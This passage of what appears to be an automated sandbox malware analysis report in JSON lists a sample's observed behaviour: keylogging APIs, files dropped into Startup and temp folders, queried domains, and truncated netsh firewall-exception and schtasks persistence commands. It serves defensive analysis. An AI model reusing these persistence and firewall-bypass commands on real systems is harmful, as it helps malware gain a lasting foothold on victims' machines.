\"rundl32.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CERTIFICATES\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CRLS\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CTLS\"; Key: \"\")\n \"rundl32.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\"; Key: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"Stable_Network.exe\" called \"CopyFileW\" to copy %TEMP%\\aut3301.tmp to new location %TEMP%\\asacpiex.dll (UID: 00000000-00006124)\n \"GameSDK.exe\" called \"CopyFileW\" to copy %ALLUSERSPROFILE%\\GameSDK.exe to new location %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\5b4af3576e30808651ae14fbef1ee719.exe (UID: 00000000-00003876)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-64", "type": 6, "relevance": 10, "name": "Logged script engine calls", "description": "\"Stable_Network.exe\" called \"WinHttp.WinHttpRequest.5.1.CreateObject\" ... ", "origin": "API Call", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-2", "type": 9, "name": "An application crash occurred", "description": "Report process \"dw20.exe\" was created by \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\"", "origin": "Monitored Target"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:443\"\n \"<IPv4>:1177\"\n \"<IPv4>:443\"\n \"<IPv4>:5552\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"rundl32.exe\" (UID: 00000000-00006060)\n Spawned process \"Stable_Network.exe\" (UID: 00000000-00006124)\n Spawned process \"host.exe\" (UID: 00000000-00006136)\n Spawned process \"dw20.exe\" with commandline \"-x -s 836\" (UID: 00000000-00004064)\n Spawned process \"GameSDK.exe\" (UID: 00000000-00003876)\n Spawned process \"netsh.exe\" with commandline \"netsh firewall add allowedprogram \"%ALLUSERSPROFILE%\\\\GameSDK.ex ...\" (UID: 00000000-00003972), Spawned process \"CL_Debug_Log.txt\" with commandline \"e -p\"JDQJndnqwdnqw2139dn21n3b312idDQDB\" \"%TEMP%\\\\CR_Debug_Log.tx ...\" (UID: 00000000-00003864)\n Spawned process \"cmd.exe\" with commandline \"/c schtasks.exe /Create /XML \"%TEMP%\\\\SystemCheck.xml\" /TN \"Syst ...\" (UID: 00000000-00004380), Spawned process \"schtasks.exe\" with commandline \"/Create /XML \"%TEMP%\\\\SystemCheck.xml\" /TN \"System\\\\SystemCheck\"\" (UID: 00000000-00000468)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"rundl32.exe\" (UID: 00000000-00006060)\n Spawned process \"Stable_Network.exe\" (UID: 00000000-00006124)\n Spawned process \"host.exe\" (UID: 00000000-00006136)\n Spawned process \"dw20.exe\" with commandline \"-x -s 836\" (UID: 00000000-00004064)\n Spawned process \"GameSDK.exe\" (UID: 00000000-00003876)\n Spawned process \"netsh.exe\" with commandline \"netsh firewall add allowedprogram \"%ALLUSERSPROFILE%\\\\GameSDK.ex ...\" (UID: 00000000-00003972), Spawned process \"CL_Debug_Log.txt\" with commandline \"e -p\"JDQJndnqwdnqw2139dn21n3b312idDQDB\" \"%TEMP%\\\\CR_Debug_Log.tx ...\" (UID: 00000000-00003864)\n Spawned process \"cmd.exe\" with commandline \"/c schtasks.exe /Create /XML \"%TEMP%\\\\SystemCheck.xml\" /TN \"Syst ...\" (UID: 00000000-00004380), Spawned process \"schtasks.exe\" with commandline \"/Create /XML \"%TEMP%\\\\SystemCheck.xml\" /TN \"System\\\\SystemCheck\"\" (UID: 00000000-00000468)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"2no.co\"\n \"backupwindows.ddns.net\"\n \"microsoft-365-updater.duckdns.org\"\n \"raw.githubusercontent.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "certificate-0", "type": 17, "relevance": 10, "name": "The input sample is signed with a certificate", "description": "The input sample is signed with a certificate issued by \"CN=WE1, O=Google Trust Services, C=US\" (SHA1: E6:53:F6:6A:DD:30:96:8B:62:C7:F5:4B:02:AD:91:E4:A0:47:07:46; see report for more information)\n The input sample is signed with a certificate issued by \"CN=GTS Root R4, O=Google Trust Services LLC, C=US\" (SHA1: 10:8F:BF:79:4E:18:EC:53:47:A4:14:E4:37:0C:C4:50:6C:29:7A:B2; see report for more information)\n The input sample is signed with a certificate issued by \"CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BE\" (SHA1: 93:2B:ED:33:9A:A6:92:12:C8:93:75:B7:93:04:B4:75:49:0B:89:A0; see report for more information)\n The input sample is signed with a certificate issued by \"CN=DigiCert Global G2 TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US\" (SHA1: 97:D8:C5:70:0F:12:24:6C:88:BC:FA:06:7E:8C:A7:4D:A8:62:67:28; see report for more information)\n The input sample is signed with a certificate issued by \"CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US\" (SHA1: 1B:51:1A:BE:AD:59:C6:CE:20:70:77:C0:BF:0E:00:43:B1:38:26:12; see report for more information)", "origin": "Certificate Data", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"schtasks.exe\" (UID: 00000000-00000468) was launched with new environment variables: \"PROMPT=\"$P$G\"\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"rundl32.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"5b4af3576e30808651ae14fbef1ee719.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"CL_Debug_Log.txt\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"rundl32.exe\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"\n \"5b4af3576e30808651ae14fbef1ee719.exe\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"\n \"CL_Debug_Log.txt\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x4a1ca8,push\t0x491c52,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x20,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,and\tdword ptr [ebp - 4], 0,push\t1,call\tdword ptr [0x49a160],pop\tecx,or\tdword ptr [0x4b62b4], 0xffffffff,or\tdword ptr [0x4b62b8], 0xffffffff,call\tdword ptr [0x49a164],mov\tecx, dword ptr [0x4b2278],mov\tdword ptr [eax], ecx,call\tdword ptr [0x49a168],mov\tecx, dword ptr [0x4b2274],mov\tdword ptr [eax], ecx,mov\teax, dword ptr [0x49a16c],mov\teax, dword ptr [eax],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-144", "relevance": 1, "name": "PE file contains COM data directory", "description": "\"rundl32.exe\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"\n \"5b4af3576e30808651ae14fbef1ee719.exe\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879\" was detected as \".NET\" and name: \"Library\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"rundl32.exe\" was detected as \".NET\" and name: \"Library\"\n \"rundl32.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"5b4af3576e30808651ae14fbef1ee719.exe\" was detected as \".NET\" and name: \"Library\"\n \"5b4af3576e30808651ae14fbef1ee719.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"CL_Debug_Log.txt\" was detected as \".NET\" and name: \"Library\"\n \"CL_Debug_Log.txt\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"rundl32.exe\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n \"5b4af3576e30808651ae14fbef1ee719.exe\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n \"CL_Debug_Log.txt\" has flags like IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-138", "relevance": 1, "name": "Dotnet code contains ability to query registry", "description": "Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"GetValue\" in \"rundl32.exe\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"OpenSubKey\" in \"5b4af3576e30808651ae14fbef1ee719.exe\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"GetValue\" in \"5b4af3576e30808651ae14fbef1ee719.exe\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"GetValueNames\" in \"5b4af3576e30808651ae14fbef1ee719.exe\"", "origin": "Static Parser", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"rundl32.exe\" has an executable section named \".text\"\n \"5b4af3576e30808651ae14fbef1ee719.exe\" has an executable section named \".text\"\n \"CL_Debug_Log.txt\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-126", "relevance": 1, "name": "Dotnet source code contains suspicious native API", "description": "Observed API \"MapVirtualKey\" in \"5b4af3576e30808651ae14fbef1ee719.exe\"\n Observed API \"GetAsyncKeyState\" in \"5b4af3576e30808651ae14fbef1ee719.exe\"", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-139", "relevance": 1, "name": "Dotnet code contains ability to modify/delete registry", "description": "Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"DeleteSubKey\" in \"rundl32.exe\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"CreateSubKey\" in \"rundl32.exe\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"SetValue\" in \"rundl32.exe\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"DeleteValue\" in \"5b4af3576e30808651ae14fbef1ee719.exe\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"CreateSubKey\" in \"5b4af3576e30808651ae14fbef1ee719.exe\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"SetValue\" in \"5b4af3576e30808651ae14fbef1ee719.exe\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"DeleteSubKey\" in \"5b4af3576e30808651ae14fbef1ee719.exe\"", "origin": "Static Parser", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"CL_Debug_Log.txt\" has an writable section named \".data\"\n \"CL_Debug_Log.txt\" has an writable section named \".sxdata\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Pattern Matching", "identifier": "yara-103", "type": 13, "relevance": 5, "name": "YARA signature match - AES encryption", "description": "YARA signature for AES encryption matched on process \"00000000-00006124\"\n YARA signature for AES encryption matched on process \"00000000-00003864\"\n YARA signature for AES encryption matched on file \"CL_Debug_Log.txt\"\n YARA signature for AES encryption matched on process \"00000000-00006040\"", "origin": "YARA Signature", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"rundl32.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"Stable_Network.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"rundl32.exe\" was detected as \"Microsoft visual C# v7.0 / Basic .NET\"\n \"5b4af3576e30808651ae14fbef1ee719.exe\" was detected as \"Microsoft visual C# v7.0 / Basic .NET\"\n \"CL_Debug_Log.txt\" was detected as \"Microsoft visual C++ 5.0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"rundl32.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\rundl32.exe]- [targetUID: 00000000-00006060]\n \"CL_Debug_Log.txt\" has type \"PE32 executable (console) Intel 80386 for MS Windows\"- Location: [%TEMP%\\CL_Debug_Log.txt]- [targetUID: 00000000-00006124]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"5b4af3576e30808651ae14fbef1ee719.exe\" - Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\5b4af3576e30808651ae14fbef1ee719.exe]- [targetUID: 00000000-00003876]\n Dropped file: \"host.exe\" - Location: [%APPDATA%\\host.exe]- [targetUID: 00000000-00006040]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe.config\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe.Local\\\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\fusion.localgac\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\security.config\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\security.config.cch\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\enterprisesec.config\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\enterprisesec.config.cch\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Windows\\Globalization\\en-us.nlp\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\rundl32.exe:Zone.Identifier\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Stable_Network.exe:Zone.Identifier\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\host.exe:Zone.Identifier\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\system.dll.exe:Zone.Identifier\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.pdb\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Windows\\System.pdb\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\mscorlib.pdb\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\Windows\\mscorlib.pdb\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" trying to access non-existent file \"C:\\8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.PDB\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\security.config\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\security.config.cch\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\enterprisesec.config\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\enterprisesec.config.cch\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" touched file \"C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.pdb\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" touched file \"C:\\Windows\\System.pdb\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" touched file \"C:\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\mscorlib.pdb\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" touched file \"C:\\Windows\\mscorlib.pdb\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" touched file 